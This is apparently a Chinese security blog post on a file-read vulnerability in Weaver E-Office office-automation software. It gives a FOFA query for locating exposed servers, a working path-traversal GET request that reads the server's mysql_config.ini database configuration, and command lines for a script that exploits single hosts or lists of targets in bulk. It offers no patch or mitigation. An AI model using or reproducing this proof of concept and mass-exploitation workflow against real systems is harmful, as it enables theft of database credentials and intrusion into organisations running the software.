泛微E-Office文件读取漏洞
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。
泛微E-Office前台文件读取漏洞。
二、网络空间搜索引擎查询
fofa查询
app=“泛微-EOffice”
三、漏洞复现
poc
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0
浏览器直接访问返回如下
四、批量检测与利用
单个检测与利用
python .\E-OfficeReadfile.py -u http://ip:port
批量检测
python .\E-OfficeReadfile.py -f filename
[超站]友情链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
随时掌握互联网精彩
- 1 东风浩荡万里长 4955036
- 2 麦当劳回应使用过期食材:深表歉意 4997541
- 3 郭有才走红后菏泽南站连夜修路 4865234
- 4 连通起流动的中国 4725265
- 5 年轻人开始整顿上海相亲角了 4645214
- 6 20只死亡东北虎中有10只幼虎 4541450
- 7 杨惠妍:房地产一定会迎来春天 4468178
- 8 美国宣布全面禁止竞业协议 4352749
- 9 广东交通落后县没有国道?假的 4258079
- 10 菲律宾将收紧对中国游客签证要求 4106638